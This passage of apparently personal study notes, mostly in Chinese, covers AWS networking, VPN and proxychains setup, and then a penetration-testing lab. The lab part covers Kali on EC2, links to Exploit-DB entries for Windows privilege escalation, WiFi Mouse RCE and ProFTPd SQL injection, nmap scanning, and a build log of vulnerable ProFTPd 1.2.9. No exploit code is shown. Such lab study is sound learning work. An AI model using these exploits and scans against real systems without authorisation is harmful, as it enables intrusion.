Ports)**:這些端口號範圍從 1024 到 49151。註冊端口通常用於註冊了的應用程序,但不像知名端口那樣廣泛使用。 3. **動態或私有端口(Dynamic or Private Ports)**:這些端口號範圍從 49152 到 65535。這些端口通常由客戶端應用程序動態分配,用於與伺服器端進行通信。 ## 四、設置Outbound rules ![image](https://hackmd.io/_uploads/ryqS10qCT.png) * All ICMP * All TCP ## 五、Routing Tables ### 將子網路加入route tables VPC --> Route Table --> Edit subnet associations --> Save associations ![image](https://hackmd.io/_uploads/BJ8MSRqA6.png) ### Routes * igw(Internet Gateway) * local ![image](https://hackmd.io/_uploads/BkuoBAqRp.png) ### Subnet associations * Explict subnet associations --> 可以看到剛剛添加的subnet * **注意**: 但因為目前只有一個public subnet,所以Resource Map再新增前後看不出差異 ![image](https://hackmd.io/_uploads/Syaf8CqC6.png) # 參、AWS NACL 相關問題 1. inbound / outbound rules 區分 * inbound是從我們的電腦連線到EC2,所以是針對主機(ipinfo: 公司位址) 2. 如何只擋掉特定IP(By source / destination),是本機端的IP ex: 172.18.2.214/23 * 直接將resource IP 設為欲封鎖IP 3. cloud firewall的stateless, stateful差別 * 進階版(Cloud為地端的延伸) 4. Port號,為什麼要把HTTP,HTTPS,SSH,ICMP特別拉出來(**只有開他們無法連線**,但開了All TCP or custom TCP又等於都開啟) * 針對特定功能的IP的Port做處理 * Ex: 家裡有很多扇門,欲設每一扇都鎖住,開白名單等於把限制訪客(特定IP)只能透過某一扇門(port)來通過 5. privite subnet的routing table為什麼需要3個(而不是兩個) * 系統本來就有的routing tables(因為雲端本來就是在同個VPC下,代表本來就在同個routing table連結) 6. NAT主要是把private subnet轉譯到public? ![image](https://hackmd.io/_uploads/HyGHb0qC6.png) 7. NGFW 跟 雲端防火牆的差異 [下一代防火牆 (NGFW) 與防火牆即服務 (FWaaS)](https://www.cloudflare.com/zh-tw/learning/cloud/ngfw-vs-fwaas/) ![image](https://hackmd.io/_uploads/SJhjzAq06.png) ### 筆記 * Security Group是白名單、NACL是黑名單 * 雲端已經幫我們預設Fire wall的功能,但是防火牆的概念要由地端(沒有幫我們做設定)延伸比較好理解!! # 肆、Site to site VPN * Site to site: 代表兩個不同的網域透過設定VPN來連線 * Ex: 兩家公司(各自擁有自己的網域),透過設定site to site VPN 來建立連線 * 可以透過兩個EC2建立在不同的VPC下來模擬! > 1. [AWS Site-to-Site VPN 的運作方式](https://docs.aws.amazon.com/zh_tw/vpn/latest/s2svpn/how_it_works.html) > 2. [在 AWS 上使用 OpenVPN 搭建自定義埠的 Site-to-Site VPN](https://aws.amazon.com/cn/blogs/china/setup-site-to-site-vpn-with-openvpn/) > 3. [如何在Ubuntu 22.04/Ubuntu 20.04中安裝OpenVPN](https://cn.linux-console.net/?p=1561) > 4. [3分鐘快速在Ubuntu上安裝OpenVPN](https://donggan.me/post/install-openvpn-on-ubuntu-in-3min/) ![image](https://hackmd.io/_uploads/rkPL_8ARa.png) `sudo systemctl status openvpn` ![image](https://hackmd.io/_uploads/BJKt_LR0T.png) ![image](https://hackmd.io/_uploads/ByW0uUR06.png) * `sudo update` * `sudo apt install openvpn easy-rsa` ![image](https://hackmd.io/_uploads/rJpMqPART.png) * `mk` ![image](https://hackmd.io/_uploads/SJcY9vR0p.png) * `mkdir ~/easy-rsa` * `ln -s /usr/share/easy-rsa/* ~/easy-rsa/` * `sudo chown sammy ~/easy-rsa` `chmod 700 ~/easy-rsa` ![image](https://hackmd.io/_uploads/By-0qwCAT.png) * # 伍、換成GNOME(比較漂亮的Ubuntu, 還有很多預設) ## 一、安裝 GUI 與設定super user修改visudo > 參照: [資安漏洞掃描---操作紀錄](https://ithelp.ithome.com.tw/articles/10341989) * 把[【 Cloud 】使用遠端桌面連到 AWS Ubuntu VM](https://learningsky.io/remote-desktop-connect-aws-ubuntu-vm/)裡面`xfce4`的地方改成`gnome` ## 二、下載中文字/切換輸入法 * Setting --> Region & Language --> Manage /Install language --> Install language ![image](https://hackmd.io/_uploads/BJwy3tAC6.png) ![image](https://hackmd.io/_uploads/ryfym5ARp.png) * `sudo passwd ubuntu` : 設定Ubuntu帳號的密碼 ### 安裝Chrome(不用預設的firefox) ![image](https://hackmd.io/_uploads/B1ypB900a.png) > 參照: [資安漏洞掃描---操作紀錄](https://ithelp.ithome.com.tw/articles/10341989) * 安裝中文輸入法 > 參照: [Ubuntu繁體中文輸入法?改用Fcitx5來輸入中文吧!](https://ivonblog.com/posts/ubuntu-fcitx5/#:~:text=%E6%8C%89SHIFT%E5%88%87%E6%8F%9B%E4%B8%AD%E8%8B%B1%E8%BC%B8%E5%85%A5%E3%80%82%20%E6%8C%89CTRL%2BSHIFT%2BF%E5%88%87%E6%8F%9B%E7%B0%A1%E7%B9%81%E8%BC%B8%E5%85%A5%E3%80%82,SHIFT%2B%E7%A9%BA%E7%99%BD%E9%8D%B5%E5%88%87%E6%8F%9B%E5%85%A8%E5%BD%A2%2F%E5%8D%8A%E5%BD%A2%E3%80%82%20SHIFT%2B%E9%8D%B5%E7%9B%A4%E4%B8%8A%E7%9A%84%E6%A8%99%E9%BB%9E%E7%AC%A6%E8%99%9F%E6%89%93%E5%85%A8%E5%BD%A2%E5%AD%97%E5%85%83%E3%80%82%20%E5%9C%A8Gedit%E9%80%99%E9%A1%9E%E6%96%87%E5%AD%97%E7%B7%A8%E8%BC%AF%E5%99%A8%E9%81%B8%E5%8F%96%E5%AD%97%E5%85%83%EF%BC%8C%E5%86%8D%E6%8C%89CTRL%2BSHIFT%2BALT%2BN%E5%8F%AF%E6%9F%A5%E7%9C%8B%E5%85%B6Unicode%E7%B7%A8%E7%A2%BC%E3%80%82) * 注意: 記得先把系統語言切換到Taiwan * 再開啟鍵盤 --> 多了新酷音的鍵盤選項 ![image](https://hackmd.io/_uploads/HyFNZoRRa.png) * 可以輸入注音!! ![image](https://hackmd.io/_uploads/HyIzzs0Rp.png) ### 開啟工具管理員 * 指令: `gnome-system-monitor` * Processes ![image](https://hackmd.io/_uploads/B1eUv9RAT.png) * Resources ![image](https://hackmd.io/_uploads/rkGsv5ARa.png) * File system ![image](https://hackmd.io/_uploads/B1TsPcRCa.png) * 指令 `df -h`: 可以看磁碟分割情況 ![image](https://hackmd.io/_uploads/HJZlPsA06.png) ### Ubuntu 快捷鍵 * `win鍵` --> 縮放桌面 ![image](https://hackmd.io/_uploads/BkEaqi0CT.png) * `tab鍵` --> 切換桌面 ![image](https://hackmd.io/_uploads/B1seosACp.png) * `su`: 切換為super user * `exit`: 換回普通user # 陸、端口轉接 Proxychains4 > 參考: [SSH Tunnel 連線 (SSH port forwarding)](https://ithelp.ithome.com.tw/articles/10332572#:~:text=Remote%20Port%20Forwarding,%EF%BC%9A%E5%85%81%E8%A8%B1%E9%81%A0%E7%A8%8B%E4%B8%BB%E6%A9%9F%E4%B8%8A%E7%9A%84%E4%B8%80%E5%80%8B%E7%AB%AF%E5%8F%A3%E7%9A%84%E6%B5%81%E9%87%8F%E8%BD%89%E7%99%BC%E5%88%B0%E6%9C%AC%E5%9C%B0%E8%A8%88%E7%AE%97%E6%A9%9F%E4%B8%8A%E7%9A%84%E4%B8%80%E5%80%8B%E7%AB%AF%E5%8F%A3%E3%80%82%20%E9%80%99%E9%80%9A%E5%B8%B8%E7%94%A8%E6%96%BC%E5%AF%A6%E7%8F%BE%E9%80%86%E5%90%91%E9%80%A3%E6%8E%A5%EF%BC%8C%E4%BD%BF%E9%81%A0%E7%A8%8B%E4%B8%BB%E6%A9%9F%E4%B8%8A%E7%9A%84%E6%87%89%E7%94%A8%E7%A8%8B%E5%BA%8F%E5%8F%AF%E4%BB%A5%E8%A8%AA%E5%95%8F%E6%9C%AC%E5%9C%B0%E8%A8%88%E7%AE%97%E6%A9%9F%E4%B8%8A%E7%9A%84%E6%9C%8D%E5%8B%99%E3%80%82%20%E4%BE%8B%E5%A6%82%EF%BC%8C%E6%82%A8%E5%8F%AF%E4%BB%A5%E5%B0%87%E9%81%A0%E7%A8%8B%E4%B8%BB%E6%A9%9F%E4%B8%8A%E7%9A%84%E7%AB%AF%E5%8F%A322%EF%BC%88SSH%E6%9C%8D%E5%8B%99%EF%BC%89%E8%BD%89%E7%99%BC%E5%88%B0%E6%9C%AC%E5%9C%B0%E8%A8%88%E7%AE%97%E6%A9%9F%E7%9A%84%E7%AB%AF%E5%8F%A32222%EF%BC%8C%E4%BB%A5%E5%85%81%E8%A8%B1%E9%81%A0%E7%A8%8B%E4%B8%BB%E6%A9%9F%E9%80%9A%E9%81%8ESSH%E9%80%A3%E6%8E%A5%E5%88%B0%E6%9C%AC%E5%9C%B0%E8%A8%88%E7%AE%97%E6%A9%9F%E3%80%82) > 參考: [滲透測試小白的 CPENT 證照學習筆記系列 第 12 篇 ProxyChains 實現應用代理](https://ithelp.ithome.com.tw/articles/10328383) ## 一、安裝/設定Proxychains4 > 參考: [Ubuntu安装Proxychains4](https://blog.csdn.net/lan120576664/article/details/100784380) * `sudo apt-get update` * `sudo apt-get install proxychains4` * `sudo nano /etc/proxychains4.conf` * 在設定檔新增`socks 127.0.0.1 9050` ![image](https://hackmd.io/_uploads/SJ47Qs0CT.png) ## 二、安裝Nmap * `sudo apt update` * `sudo apt install nmap` * `proxychains4 nmap -sn 192.168.0.7` ![image](https://hackmd.io/_uploads/SJyhg2CRa.png) ## 三、官方文檔 > [ProxyChains ver. 4.3.0](https://github.com/haad/proxychains) ### 問題 官網範例或是wget google均出現"timeout"問題 * `proxychains4 telnet targethost.com` ![image](https://hackmd.io/_uploads/BJ9T5hARp.png) 但firefox可以成功開啟 * `proxychains4 firefox` ![image](https://hackmd.io/_uploads/SJwDo3R06.png) ### Q: 是Proxychains4設定檔的問題 or cloud上firewall subnet group inbound ports rule問題? ### 查看設定檔 * 檔案 --> 其他的位置 --> /etc --> 搜尋Proxy --> 開啟`proxychain4.config`檔案 ![image](https://hackmd.io/_uploads/ByiUR20RT.png) ![image](https://hackmd.io/_uploads/r1M5An0CT.png) ``` # proxychains.conf VER 4.x # # HTTP, SOCKS4a, SOCKS5 tunneling proxifier with DNS. # The option below identifies how the ProxyList is treated. # only one option should be uncommented at time, # otherwise the last appearing option will be accepted # #dynamic_chain # # Dynamic - Each connection will be done via chained proxies # all proxies chained in the order as they appear in the list # at least one proxy must be online to play in chain # (dead proxies are skipped) # otherwise EINTR is returned to the app # strict_chain # # Strict - Each connection will be done via chained proxies # all proxies chained in the order as they appear in the list # all proxies must be online to play in chain # otherwise EINTR is returned to the app # #round_robin_chain # # Round Robin - Each connection will be done via chained proxies # of chain_len length # all proxies chained in the order as they appear in the list # at least one proxy must be online to play in chain # (dead proxies are skipped). # the start of the current proxy chain is the proxy after the last # proxy in the previously invoked proxy chain. # if the end of the proxy chain is reached while looking for proxies # start at the beginning again. # otherwise EINTR is returned to the app # These semantics are not guaranteed in a multithreaded environment. # #random_chain # # Random - Each connection will be done via random proxy # (or proxy chain, see chain_len) from the list. # this option is good to test your IDS :) # Make sense only if random_chain or round_robin_chain #chain_len = 2 # Quiet mode (no output from library) #quiet_mode ## Proxy DNS requests - no leak for DNS data # (disable all of the 3 items below to not proxy your DNS requests) # method 1. this uses the proxychains4 style method to do remote dns: # a thread is spawned that serves DNS requests and hands down an ip # assigned from an internal list (via remote_dns_subnet). # this is the easiest (setup-wise) and fastest method, however on # systems with buggy libcs and very complex software like webbrowsers # this might not work and/or cause crashes. proxy_dns # method 2. use the old proxyresolv script to proxy DNS requests # in proxychains 3.1 style. requires `proxyresolv` in $PATH # plus a dynamically linked `dig` binary. # this is a lot slower than `proxy_dns`, doesn't support .onion URLs, # but might be more compatible with complex software like webbrowsers. #proxy_dns_old # method 3. use proxychains4-daemon process to serve remote DNS requests. # this is similar to the threaded `proxy_dns` method, however it requires # that proxychains4-daemon is already running on the specified address. # on the plus side it doesn't do malloc/threads so it should be quite # compatible with complex, async-unsafe software. # note that if you don't start proxychains4-daemon before using this, # the process will simply hang. #proxy_dns_daemon 127.0.0.1:1053 # set the class A subnet number to use for the internal remote DNS mapping # we use the reserved 224.x.x.x range by default, # if the proxified app does a DNS request, we will return an IP from that range. # on further accesses to this ip we will send the saved DNS name to the proxy. # in case some control-freak app checks the returned ip, and denies to # connect, you can use another subnet, e.g. 10.x.x.x or 127.x.x.x. # of course you should make sure that the proxified app does not need # *real* access to this subnet. # i.e. dont use the same subnet then in the localnet section #remote_dns_subnet 127 #remote_dns_subnet 10 remote_dns_subnet 224 # Some timeouts in milliseconds tcp_read_time_out 15000 tcp_connect_time_out 8000 ### Examples for localnet exclusion ## localnet ranges will *not* use a proxy to connect. ## note that localnet works only when plain IP addresses are passed to the app, ## the hostname resolves via /etc/hosts, or proxy_dns is disabled or proxy_dns_old used. ## Exclude connections to 192.168.1.0/24 with port 80 # localnet 192.168.1.0:80/255.255.255.0 ## Exclude connections to 192.168.100.0/24 # localnet 192.168.100.0/255.255.255.0 ## Exclude connections to ANYwhere with port 80 # localnet 0.0.0.0:80/0.0.0.0 # localnet [::]:80/0 ## RFC6890 Loopback address range ## if you enable this, you have to make sure remote_dns_subnet is not 127 ## you'll need to enable it if you want to use an application that ## connects to localhost. # localnet 127.0.0.0/255.0.0.0 # localnet ::1/128 ## RFC1918 Private Address Ranges # localnet 10.0.0.0/255.0.0.0 # localnet 172.16.0.0/255.240.0.0 # localnet 192.168.0.0/255.255.0.0 ### Examples for dnat ## Trying to proxy connections to destinations which are dnatted, ## will result in proxying connections to the new given destinations. ## Whenever I connect to 1.1.1.1 on port 1234 actually connect to 1.1.1.2 on port 443 # dnat 1.1.1.1:1234 1.1.1.2:443 ## Whenever I connect to 1.1.1.1 on port 443 actually connect to 1.1.1.2 on port 443 ## (no need to write :443 again) # dnat 1.1.1.2:443 1.1.1.2 ## No matter what port I connect to on 1.1.1.1 port actually connect to 1.1.1.2 on port 443 # dnat 1.1.1.1 1.1.1.2:443 ## Always, instead of connecting to 1.1.1.1, connect to 1.1.1.2 # dnat 1.1.1.1 1.1.1.2 # ProxyList format # type ip port [user pass] # (values separated by 'tab' or 'blank') # # only numeric ipv4 addresses are valid # # # Examples: # # socks5 192.168.67.78 1080 lamer secret # http 192.168.89.3 8080 justu hidden # socks4 192.168.1.49 1080 # http 192.168.39.93 8080 # # # proxy types: http, socks4, socks5, raw # * raw: The traffic is simply forwarded to the proxy without modification. # ( auth types supported: "basic"-http "user/pass"-socks ) # [ProxyList] # add proxy here ... # meanwile # defaults set to "tor" socks5 127.0.0.1 9050 http 192.168.0.1 8080 ``` > 詳細設定檔完整程式 ### 目前port連線狀況 * `nc -zv 127.0.0.1 9050`: 9050可以更換為其他port,由圖 ![image](https://hackmd.io/_uploads/Hy2qf60Aa.png) * `sudo ss -tuln`: 檢查目前所有port的連線狀況 ![image](https://hackmd.io/_uploads/HyfcQp00T.png) 由圖可知,目前連線的只有 * 22 * 53 * 3389 * 3350 # 柒、Site to site VPn * [AWS Site-to-Site VPN 入門](https://docs.aws.amazon.com/vpn/latest/s2svpn/SetUpVPNConnections.html) 今日完工 1. 下載完不同VPC的EC2 2. 知道site to site vpc的步驟 * [AWS Site-to-Site VPN 的詳細步驟](https://gemini.google.com/share/ce2bc58dff2e) * [《AWS 教學–如何在不同的VPC建立一條可互通的通道》VPC PEERING操作分享 | 學習筆記](https://www.bing.com/search?q=aws上兩個不同的vpc要如何建立site+to+site+vpc&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&sm=u&pq=aws上兩個不同的vpc要如何建立site+to+site+vpc&sc=6-33&sk=&cvid=85DDD7A1F5D4417494A62C6CB64DD5AD&ghsh=0&ghacc=0&ghpl=) ## 參照步驟 [AWS 混合雲:使用 BGP 設置 AWS 到本地 IPSec VPN 和動態路由的分步指南](https://awstip.com/aws-site-to-site-vpn-set-up-with-bgp-routing-4e6475952075) ![image](https://hackmd.io/_uploads/r1XodimyR.png) ![image](https://hackmd.io/_uploads/SkJTusXyA.png) ![image](https://hackmd.io/_uploads/r1w0usQkC.png) --- # 壹、AWS 定價模型紀錄 ### [Price Calculate](https://calculator.aws/#/createCalculator/CloudTrail) ### AWS Solution Library [Solutions for Cloud Operations](https://aws.amazon.com/tw/solutions/cloud-operations/) ## AWS Community Builders Program Category 1. Cloud Operations 2. Containers 3. Data 4. Dev Tools 5. Front-End Web & Mobile 6. Game Tech 7. Graviton Arm 8. Machine Learning 9. Networking & Content Delivery 10. Security & Identity 11. Serverless 12. Storage # 貳、Exploit-DB > 1.[Day 10攻擊腳本搜尋工具-searchsploit(Exploitation tool-searchsploit)](https://ithelp.ithome.com.tw/articles/10321944) > 2. [入門級資安實戰:以Hack The Box為輔學習網路漏洞掃描與利用 ](https://ithelp.ithome.com.tw/users/20145688/ironman/6733) > 3. [查找漏洞代码 - exploit-db的使用](https://cloud.tencent.com/developer/article/1399467) > 4. [Kali Linux Web滲透測試手冊(第二版) - 7.1 - 使用Exploit-DB利用Heartbleed漏洞](https://cloud.tencent.com/developer/article/1399467) ## 一、資安飛飛文章 > [關於資安這條路,飛飛來領路](https://feifei.tw/) ![image](https://hackmd.io/_uploads/H10LzjPyA.png) ## Sumo 介紹 [雲 SIEM 簡介](https://help.sumologic.com/docs/cse/introduction-to-cloud-siem/) ### 電腦設備 ![image](https://hackmd.io/_uploads/H177XAgxC.png) ![image](https://hackmd.io/_uploads/B1IyVRelR.png) --- ![image](https://hackmd.io/_uploads/SJqrxY8eA.png) # Expoit DB [提權輔助工具:Windows--exploit-suggester.py 安裝及使用](https://blog.csdn.net/weixin_45650977/article/details/112554489) [Github AonCyberLabs / Windows-Exploit-Suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester) [滲透測試介紹及實作](https://ithelp.ithome.com.tw/users/20107475/ironman/1374) 針對windows 1809找漏洞 ![image](https://hackmd.io/_uploads/BJvx_umgC.png) > [Exploit Database ](https://www.exploit-db.com/search?q=1809&platform=windows) ## 使用漏洞 [Microsoft Windows 10 1903/1809 - RPCSS Activation Kernel Security Callback Privilege Escalation](https://www.exploit-db.com/exploits/47135) ### EC2 Windows2019 Base版本號 ![image](https://hackmd.io/_uploads/SJwCR_7g0.png) ### 改用其他漏洞 `sudo yum install python3 sudo yum install python3-pip ` `pip3 install requests` ## 漏洞們 [WiFi Mouse 1.7.8.5 - Remote Code Execution(v2)](https://www.exploit-db.com/exploits/50972) # 載Kali [在 AWS 上設定 Kali Linux EC2 平臺(第 2 章)](https://medium.com/aws-cloud-penetration-testing-offensive-security/setting-up-a-kali-linux-ec2-platform-on-aws-chapter-2-9ee38e9f6d1a) ### 滿了QQ ![image](https://hackmd.io/_uploads/S1kJ8DLxC.png) ### 換100G,總該夠了吧 ![image](https://hackmd.io/_uploads/Bk5zdOIxC.png) ### 100G夠了!!!🤩共花了43G(前三個指令只有11G) 這些是參考網站的前置步驟 1. `sudo apt update && sudo apt install -y kali-linux-headless` 2. `sudo apt update && sudo apt install -y kali-desktop-xfce` 3. `sudo apt-get update && sudo apt-get -y upgrade` 4. `sudo apt-get install -y kali-linux-everything` ### 記得要加另外的指令,設定xrdp 5. `sudo apt update` 6. `sudo apt install -y xrdp` 7. `sudo service xrdp start` 8. `sudo update-rc.d xrdp enable` ### 設定帳號密碼 username換成自己的帳戶名 * `sudo adduser <newusername>` * `sudo usermod -aG sudo newusername` ### 記得Security Group要開 inbound rule 3389(RDP) ## 成功開啟Kali囉 ![image](https://hackmd.io/_uploads/ryZo2OIgC.png) ## 下載可視化觀測 * `sudo apt update` * `sudo apt install htop` * `htop` ![image](https://hackmd.io/_uploads/H1C9JtIlR.png) ### 其他漏洞 [ProFTPd 1.2.9 RC1 - 'mod_sql' SQL Injection](https://www.exploit-db.com/exploits/43) # Week 7 ### 禮拜一的htop ![image](https://hackmd.io/_uploads/ByC28-qlC.png) kth跑到100%了 ![image](https://hackmd.io/_uploads/SkqbuW9g0.png) ## 相關指令 ``` ┌──(root㉿kali)-[/home/iris] └─# cd Downloads ┌──(root㉿kali)-[/home/iris/Downloads] └─# ls 7c85503b160a36a96594ef75f3180a07-proftpd-1.2.9.tar.bz2 ┌──(root㉿kali)-[/home/iris/Downloads] └─# tar -xvjf 7c85503b160a36a96594ef75f3180a07-proftpd-1.2.9.tar.bz2 ┌──(root㉿kali)-[/home/iris/Downloads/proftpd-1.2.9] └─# ./configure ┌──(root㉿kali)-[/home/iris/Downloads/proftpd-1.2.9] └─# make echo \#define BUILD_STAMP \"`date`\" >include/buildstamp.h cd lib/ && make lib make[1]: Entering directory '/home/iris/Downloads/proftpd-1.2.9/lib' gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c pr_fnmatch.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c sstrncpy.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c strsep.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c vsnprintf.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c glibc-glob.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c glibc-hstrerror.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c glibc-mkstemp.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c pr-syslog.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c pwgrent.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c getopt.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c getopt1.c ar rc libsupp.a pr_fnmatch.o sstrncpy.o strsep.o vsnprintf.o glibc-glob.o glibc-hstrerror.o glibc-mkstemp.o pr-syslog.o pwgrent.o getopt.o getopt1.o ranlib libsupp.a make[1]: Leaving directory '/home/iris/Downloads/proftpd-1.2.9/lib' cd src/ && make src make[1]: Entering directory '/home/iris/Downloads/proftpd-1.2.9/src' gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c main.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c timers.c timers.c: In function ‘sig_alarm’: timers.c:146:3: warning: ‘siginterrupt’ is deprecated: Use sigaction with SA_RESTART instead [-Wdeprecated-declarations] 146 | siginterrupt(SIGALRM, 1); | ^~~~~~~~~~~~ In file included from /usr/include/x86_64-linux-gnu/sys/wait.h:36, from ../include/conf.h:78, from timers.c:31: /usr/include/signal.h:324:12: note: declared here 324 | extern int siginterrupt (int __sig, int __interrupt) __THROW | ^~~~~~~~~~~~ timers.c: In function ‘set_sig_alarm’: timers.c:174:3: warning: ‘siginterrupt’ is deprecated: Use sigaction with SA_RESTART instead [-Wdeprecated-declarations] 174 | siginterrupt(SIGALRM, 1); | ^~~~~~~~~~~~ /usr/include/signal.h:324:12: note: declared here 324 | extern int siginterrupt (int __sig, int __interrupt) __THROW | ^~~~~~~~~~~~ At top level: cc1: note: unrecognized command-line option ‘-Wno-long-double’ may have been intended to silence earlier diagnostics gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c sets.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c pool.c pool.c: In function ‘fd_cleanup_cb’: pool.c:751:9: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] 751 | close((int)fdv); | ^ pool.c: In function ‘register_fd_cleanups’: pool.c:755:23: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast] 755 | register_cleanup(p, (void *)fd, fd_cleanup_cb, fd_cleanup_cb); | ^ pool.c: In function ‘pclosef’: pool.c:773:25: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast] 773 | unregister_cleanup(p, (void *)fd, fd_cleanup_cb); | ^ pool.c: In function ‘pfclose’: pool.c:833:3: warning: pointer ‘fd’ used after ‘fclose’ [-Wuse-after-free] 833 | unregister_cleanup(p, (void *) fd, file_cleanup_cb); | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ pool.c:832:9: note: call to ‘fclose’ here 832 | res = fclose(fd); | ^~~~~~~~~~ At top level: cc1: note: unrecognized command-line option ‘-Wno-long-double’ may have been intended to silence earlier diagnostics gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c regexp.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c dirtree.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c support.c support.c: In function ‘pr_memscrub’: support.c:822:43: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] 822 | memscrub_ctr += (17 + (unsigned char)((int) p & 0xF)); | ^ support.c: In function ‘sreplace’: support.c:805:1: warning: function may return address of local variable [-Wreturn-local-addr] 805 | } | ^ support.c:725:8: note: declared here 725 | char buf[PR_TUNABLE_PATH_MAX] = {'\0'}, *pbuf = NULL; | ^~~ support.c:725:8: note: declared here At top level: cc1: note: unrecognized command-line option ‘-Wno-long-double’ may have been intended to silence earlier diagnostics gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c netaddr.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c inet.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c log.c log.c: In function ‘log_xfer’: log.c:116:5: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 7 has type ‘off_t’ {aka ‘long int ’} [-Wformat=] 116 | "%s %ld %s %" PR_LU " %s %c _ %c %c %s ftp %c %s %c\n", | ^~~~~~~~~~~~~ 117 | fmt_time(time(NULL)), xfertime, remhost, fsize, fbuf, xfertype, direction, | ~~~~~ | | | off_t {aka long int} In file included from log.c:31: ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" log.c: In function ‘log_wtmp’: log.c:229:10: warning: passing argument 1 of ‘time’ from incompatible pointer type [-Wincompatible-pointer-types] 229 | time(&ut.ut_time); | ^ | | | int32_t * {aka int *} In file included from ../include/conf.h:155: /usr/include/time.h:76:29: note: expected ‘time_t *’ {aka ‘long int *’} but argument is of type ‘int32_t *’ {aka ‘int *’} 76 | extern time_t time (time_t *__timer) __THROW; | ~~~~~~~~^~~~~~~ At top level: cc1: note: unrecognized command-line option ‘-Wno-long-double’ may have been intended to silence earlier diagnostics gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c bindings.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c scoreboard.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c feat.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c netio.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c response.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c ident.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c data.c data.c: In function ‘data_pasv_open’: data.c:262:33: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 5 has type ‘off_t’ {aka ‘long int’} [-Wformat=] 262 | pr_response_send(R_150, "Opening %s mode data connection for %s " | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 263 | "(%" PR_LU " bytes)", MODE_STRING, reason, size); | ~~~~ | | | off_t {aka long int} In file included from data.c:32: ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" data.c: In function ‘data_active_open’: data.c:362:33: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 5 has type ‘off_t’ {aka ‘long int’} [-Wformat=] 362 | pr_response_send(R_150, "Opening %s mode data connection for %s " | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 363 | "(%" PR_LU " bytes)", MODE_STRING, reason, size); | ~~~~ | | | off_t {aka long int} ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" data.c: In function ‘pr_data_open’: data.c:505:5: warning: ‘siginterrupt’ is deprecated: Use sigaction with SA_RESTART instead [-Wdeprecated-declarations] 505 | siginterrupt(SIGURG, 1); | ^~~~~~~~~~~~ In file included from /usr/include/x86_64-linux-gnu/sys/wait.h:36, from ../include/conf.h:78: /usr/include/signal.h:324:12: note: declared here 324 | extern int siginterrupt (int __sig, int __interrupt) __THROW | ^~~~~~~~~~~~ At top level: cc1: note: unrecognized command-line option ‘-Wno-long-double’ may have been intended to silence earlier diagnostics gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c modules.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c auth.c auth.c: In function ‘auth_setpwent’: auth.c:89:13: warning: variable ‘mr’ set but not used [-Wunused-but-set-variable] 89 | modret_t *mr = NULL; | ^~ auth.c: In function ‘auth_endpwent’: auth.c:104:13: warning: variable ‘mr’ set but not used [-Wunused-but-set-variable] 104 | modret_t *mr = NULL; | ^~ auth.c: In function ‘auth_setgrent’: auth.c:119:13: warning: variable ‘mr’ set but not used [-Wunused-but-set-variable] 119 | modret_t *mr = NULL; | ^~ auth.c: In function ‘auth_endgrent’: auth.c:134:13: warning: variable ‘mr’ set but not used [-Wunused-but-set-variable] 134 | modret_t *mr = NULL; | ^~ auth.c: In function ‘auth_getpwuid’: auth.c:251:24: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast] 251 | cmd = make_cmd(p, 1, (void *) uid); | ^ auth.c: In function ‘auth_getgrgid’: auth.c:318:24: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast] 318 | cmd = make_cmd(p, 1, (void *) gid); | ^ auth.c: In function ‘auth_uid_name’: auth.c:393:24: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast] 393 | cmd = make_cmd(p, 1, (void *) uid); | ^ auth.c: In function ‘auth_gid_name’: auth.c:418:24: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast] 418 | cmd = make_cmd(p, 1, (void *) gid); | ^ auth.c: In function ‘auth_name_uid’: auth.c:444:11: 